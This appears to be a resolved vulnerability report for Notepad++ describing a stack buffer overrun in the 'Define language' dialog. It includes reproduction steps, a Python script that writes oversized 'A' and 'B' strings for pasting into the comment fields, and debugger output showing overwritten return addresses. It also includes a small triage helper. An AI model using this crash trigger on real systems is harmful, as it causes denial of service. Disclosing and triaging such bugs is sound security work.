
Security check failure or stack buffer overrun (crash)

Low
Notepad++
Submitted None
Reported by bi7s

Vulnerability Details

Technical details and impact analysis

Buffer Over-read
poc.py

1. Run poc.py
2. Open notepad++.exe
3. Go to "Define language..."
4. Use tab "Comment and Number"
5. Open 1st_field.txt and copy content to clipboard
6. Paste clipboard on "Comment line style in field Open"
7. Open 2nd_field.txt and copy content to clipboard
8. Paste clipboard on "Comment line style in field Close"
9. Notepad++ crashes

```python
#!/usr/bin/python
# Writes the two text files whose contents are pasted into the
# "Open" and "Close" fields in steps 5-8.
buffer1 = "A" * 20000
buffer2 = "B" * 11000

try:
    f = open("1st_field.txt", "w")
    print("[+] Creating %s bytes for 1st field." % len(buffer1))
    f.write(buffer1)
    f.close()
    print("[+] File created!")
except IOError:
    print("File for 1st field cannot be created.")

try:
    f = open("2nd_field.txt", "w")
    print("[+] Creating %s bytes for 2nd field." % len(buffer2))
    f.write(buffer2)
    f.close()
    print("[+] File for 2nd field created!")
except IOError:
    print("File for 2nd field cannot be created.")
```

Debugger information:

```
ccc.600): Security check failure or stack buffer overrun - code c0000409 (!!! second chance !!!)
*** ERROR: Module load completed but symbols could not be loaded for npp.exe
npp+0x139d34:
00007ff6`8ee39d34 cd29            int     29h
0:000> r
rax=0000000000000001 rbx=0042004200420042 rcx=0000000000000002
rdx=0000009ec8b25b0e rsi=00007ff68ef96b90 rdi=0042004200420042
rip=00007ff68ee39d34 rsp=0000009ec8b07820 rbp=0000009ec8b25969
 r8=000001265173ef68  r9=0000009ec8b078a0 r10=0000000000000000
r11=0000000000000246 r12=0000000000180b4a r13=0000000000180b4a
r14=0000000000000111 r15=0000000000000001
iopl=0         nv up ei pl nz na pe nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
npp+0x139d34:
00007ff6`8ee39d34 cd29            int     29h
0:000> k
Child-SP          RetAddr           Call Site
0000009e`c8b07820 00007ff6`8ee211fa npp+0x139d34
0000009e`c8b07860 00420042`00420042 npp+0x1211fa
0000009e`c8b258e0 00420042`00420042 0x00420042`00420042
0000009e`c8b258e8 00420042`00420042 0x00420042`00420042
0000009e`c8b258f0 00420042`00420042 0x00420042`00420042
0000009e`c8b258f8 00420042`00420042 0x00420042`00420042
0000009e`c8b25900 00420042`00420042 0x00420042`00420042
0000009e`c8b25908 00420042`00420042 0x00420042`00420042
0000009e`c8b25910 00420042`00420042 0x00420042`00420042
0000009e`c8b25918 00420042`00420042 0x00420042`00420042
0000009e`c8b25920 00420042`00420042 0x00420042`00420042
0000009e`c8b25928 00420042`00420042 0x00420042`00420042
0000009e`c8b25930 00420042`00420042 0x00420042`00420042
0000009e`c8b25938 00420042`00420042 0x00420042`00420042
0000009e`c8b25940 00420042`00420042 0x00420042`00420042
0000009e`c8b25948 00420042`00420042 0x00420042`00420042
0000009e`c8b25950 00420042`00420042 0x00420042`00420042
0000009e`c8b25958 00420042`00420042 0x00420042`00420042
0000009e`c8b25960 00420042`00420042 0x00420042`00420042
0000009e`c8b25968 00420042`00420042 0x00420042`00420042
0000009e`c8b25970 00420042`00420042 0x00420042`00420042
0000009e`c8b25978 00420042`00420042 0x00420042`00420042
0000009e`c8b25980 00420042`00420042 0x00420042`00420042
0000009e`c8b25988 00420042`00420042 0x00420042`00420042
0000009e`c8b25990 00420042`00420042 0x00420042`00420042
0000009e`c8b25998 00420042`00420042 0x00420042`00420042
0000009e`c8b259a0 00420042`00420042 0x00420042`00420042
0000009e`c8b259a8 00420042`00420042 0x00420042`00420042
0000009e`c8b259b0 00420042`00420042 0x00420042`00420042
0000009e`c8b259b8 00420042`00420042 0x00420042`00420042
0000009e`c8b259c0 00420042`00420042 0x00420042`00420042
0000009e`c8b259c8 00420042`00420042 0x00420042`00420042
0000009e`c8b259d0 00420042`00420042 0x00420042`00420042
0000009e`c8b259d8 00420042`00420042 0x00420042`00420042
0000009e`c8b259e0 00420042`00420042 0x00420042`00420042
0000009e`c8b259e8 00420042`00420042 0x00420042`00420042
0000009e`c8b259f0 00420042`00420042 0x00420042`00420042
0000009e`c8b259f8 00420042`00420042 0x00420042`00420042
0000009e`c8b25a00 00420042`00420042 0x00420042`00420042
0000009e`c8b25a08 00420042`00420042 0x00420042`00420042
0000009e`c8b25a10 00420042`00420042 0x00420042`00420042
0000009e`c8b25a18 00420042`00420042 0x00420042`00420042
0000009e`c8b25a20 00420042`00420042 0x00420042`00420042
0000009e`c8b25a28 00420042`00420042 0x00420042`00420042
0000009e`c8b25a30 00420042`00420042 0x00420042`00420042
0000009e`c8b25a38 00420042`00420042 0x00420042`00420042
0000009e`c8b25a40 00420042`00420042 0x00420042`00420042
0000009e`c8b25a48 00420042`00420042 0x00420042`00420042
0000009e`c8b25a50 00420042`00420042 0x00420042`00420042
0000009e`c8b25a58 00420042`00420042 0x00420042`00420042
0000009e`c8b25a60 00420042`00420042 0x00420042`00420042
0000009e`c8b25a68 00420042`00420042 0x00420042`00420042
0000009e`c8b25a70 00420042`00420042 0x00420042`00420042
0000009e`c8b25a78 00420042`00420042 0x00420042`00420042
0000009e`c8b25a80 00420042`00420042 0x00420042`00420042
0000009e`c8b25a88 00420042`00420042 0x00420042`00420042
0000009e`c8b25a90 00420042`00420042 0x00420042`00420042
0000009e`c8b25a98 00420042`00420042 0x00420042`00420042
0000009e`c8b25aa0 00420042`00420042 0x00420042`00420042
0000009e`c8b25aa8 00420042`00420042 0x00420042`00420042
0000009e`c8b25ab0 00420042`00420042 0x00420042`00420042
0000009e`c8b25ab8 00420042`00420042 0x00420042`00420042
0000009e`c8b25ac0 00420042`00420042 0x00420042`00420042
0000009e`c8b25ac8 00420042`00420042 0x00420042`00420042
0000009e`c8b25ad0 00420042`00420042 0x00420042`00420042
0000009e`c8b25ad8 00420042`00420042 0x00420042`00420042
0000009e`c8b25ae0 00420042`00420042 0x00420042`00420042
0000009e`c8b25ae8 00420042`00420042 0x00420042`00420042
0000009e`c8b25af0 00420042`00420042 0x00420042`00420042
0000009e`c8b25af8 00420042`00420042 0x00420042`00420042
0000009e`c8b25b00 00200033`00300020 0x00420042`00420042
0000009e`c8b25b08 00000000`00340030 0x00200033`00300020
0000009e`c8b25b10 00000000`00000001 0x340030
0000009e`c8b25b18 0000009e`c8b25b20 0x1
0000009e`c8b25b20 00000000`00000000 0x0000009e`c8b25b20
0:000> q
```

## Impact

At least it's a denial of service.
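A crash-triage helper, added here as an example and not part of the original report: it parses WinDbg `k` rows like those in the stack trace above and flags frames whose return address is really UTF-16 text, which is how `00420042`00420042` reads as "BBBB". The function names and the five-row sample (copied from the trace) are choices made for this example.

```python
import re
import struct

# Rows copied from the `k` output in the report (trimmed to five frames).
SAMPLE_K = """\
Child-SP          RetAddr           Call Site
0000009e`c8b07820 00007ff6`8ee211fa npp+0x139d34
0000009e`c8b07860 00420042`00420042 npp+0x1211fa
0000009e`c8b258e0 00420042`00420042 0x00420042`00420042
0000009e`c8b25b00 00200033`00300020 0x00420042`00420042
0000009e`c8b25b08 00000000`00340030 0x00200033`00300020
"""

# Child-SP, RetAddr and Call Site columns of one frame row.
ROW = re.compile(
    r"^([0-9a-f]{8}`[0-9a-f]{8})\s+([0-9a-f]{8}`[0-9a-f]{8})\s+(\S+)", re.M)


def as_utf16_text(addr):
    """Return the ASCII text a 64-bit value spells as UTF-16LE, else None."""
    value = int(addr.replace("`", ""), 16)
    units = list(struct.unpack("<4H", struct.pack("<Q", value)))
    while units and units[-1] == 0:      # allow a NUL-terminated tail
        units.pop()
    # Heuristic: at least two code units, all printable ASCII.
    if len(units) < 2 or not all(0x20 <= u < 0x7F for u in units):
        return None
    return "".join(map(chr, units))


def triage(k_output):
    """List (child_sp, ret_addr, text) for frames whose RetAddr is text."""
    hits = []
    for child_sp, ret_addr, _site in ROW.findall(k_output):
        text = as_utf16_text(ret_addr)
        if text is not None:
            hits.append((child_sp, ret_addr, text))
    return hits


if __name__ == "__main__":
    for child_sp, ret_addr, text in triage(SAMPLE_K):
        print("%s  RetAddr %s decodes to %r" % (child_sp, ret_addr, text))
```

Frames flagged this way mean saved return addresses were overwritten by input data, so the crash should be triaged as a stack overwrite stopped by the compiler's stack cookie check rather than as a benign fault.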

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Submitted

Weakness

Buffer Over-read